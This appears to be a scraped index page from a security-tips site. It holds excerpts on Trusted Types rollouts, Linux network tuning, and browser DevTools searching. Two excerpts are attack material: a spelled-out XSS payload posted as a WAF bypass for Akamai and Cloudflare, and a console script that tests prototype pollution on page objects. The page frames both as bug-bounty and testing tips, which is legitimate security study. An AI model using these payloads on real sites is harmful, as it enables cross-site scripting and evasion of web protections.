Hackertips.today - Constantly learning and collaborating in an InfoSec world

 REPOST A Deep Dive into JS Trusted Types Violations In our previous blogpost, we provided a comprehensive overview of the Trusted Types (TT) rollout in AppSheet, highlighting the importance of this web security standard for mitigating Cross-Site Scripting (XSS) vulnerabilities. Now, we're ready to dive into the technical details of how we identified the root causes for TT violations. In particular, this blog post will detail the challenges we encountered with 2 flagship rollouts: Gmail and AppSheet. Since the rollout of Trusted Types in those products a year ago, we didn’t have a single DOM XSS reported in them. Both services presented us with unique obstacles during the Trusted Types rollout, yet they also shared common characteristics whose complexity we had to deal with (large codebase, diverse OSS and OSS legacy stack, …). The code was not written following Google standard practises so we could not use Google standard toolings. Therefore, we believe that our approach to these ...

  (() => {   const ArrayOfInterestingObjects = ['google', 'gapi', 'gadgets', 'ga'];   // Malicious payload to test prototype pollution   const maliciousPayload = JSON.parse('{"__proto__": {"polluted": "XSS!"}}');   const pollutionResults = [];   ArrayOfInterestingObjects.forEach((key) => {     const target = window[key];     if (!target) {       console.warn(`window.${key} does not exist.`);       pollutionResults.push({         key,         exists: false,         polluted: false,         reason: 'Object does not exist',       });       return;     }     console.log(`Inspecting window.${key}:`, target);     try {       Object.assign(target, maliciousPayload);       const wasPolluted = {}.polluted === 'XSS!';       pollut...

# ------------------------------------------------------------------------------------------ Desc: TCPIP Tweaks for Ubuntu / most linux distress Note: This likely will improve your throughput.  I have had no problems with these settings  +    :  #------------------------------------------------------------------------------------------| # INTERFACE SETTINGS # ================== # Please understand these before changing them. # Check out Documentation/networking/ip-sysctl.txt in your kernel source for more details. #---[ FULL CREDIT IS GIVEN TO THE ORIGINAL POSTER ]---# |--------------------------------------------------------------------------------------| #load irc and ftp conntrack helpers if they exist /sbin/modprobe ip_conntrack_irc &>/dev/null /sbin/modprobe ip_conntrack_ftp &>/dev/null #ip fowarding (these must be 1 to be able to forward packets between interfaces!) echo 1 > /proc/sys/net/ipv4/ip_forward echo 1 > /proc/sys/net/ipv4/conf...

Just found this on LinkedIn - Props goes to Amit for the post AMIT BHAKAR AMIT BHAKAR   • 2nd Verified • 2nd Cyber Security Researcher || Bug Bounty Hunter || Penetration Tester || Ethical Hacker|| Cyber Security Researcher || Bug Bounty Hunter || Penetration Tester || Ethical Hacker|| 1d • 1 day ago • Visible to anyone on or off LinkedIn Pending You have already invited AMIT BHAKAR Bug Bounty tips 👀 New WAF Bypass Discovered - Akamai & Cloudflare 🔥 Original Post Link: https://www.linkedin.com/feed/update/urn:li:activity:7364263906405441537/ A fresh technique has been spotted that successfully bypasses WAFs like Akamai and Cloudflare. Payload -  <address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address...

How to enumerate your web app (target) easily for certain keywords - Load target - any browser pretty much right click inspect Once opened goto Sources tab -> On the left make sure "Page" is selected (not content scripts) -> right click "top" (right under the page icon you picked) -> Type in API for instance and hit ENTER You should see output like you see in the picture below, the browser will search all relevant scripts and info in the source that matches and tell you where it matched those keywords. Hackertips today

 // Usage examples: // analyzeObject(window.ga, { name: 'ga' }); // analyzeObject(appState, { name: 'appState', maxDepth: 3, tryPollute: true }); (function () { const SUSPICIOUS_NAME_RE = /(csrf|xsrf|token|auth|secret|session|jwt|apikey|api[-_]?key|bearer|cookie|hdr|header)/i; function analyzeObject(target, { name = '(anonymous)', maxDepth = 2, tryPollute = false, // off by default; if true, adds & removes a probe on the prototype showValues = false // keep false to avoid dumping sensitive values to the console } = {}) { if (target == null || (typeof target !== 'object' && typeof target !== 'function')) { console.warn(`[X] Target '${name}' is not an object/function or is null/undefined.`); return; } console.group(`[?] Analyzing '${name}'`); const ownProps = Object.getOwnPropertyNames(target); console.log(`[^] Own properties (${ownProps.length}):`, ownProps); // Classify const types = ownProps.reduce((ac...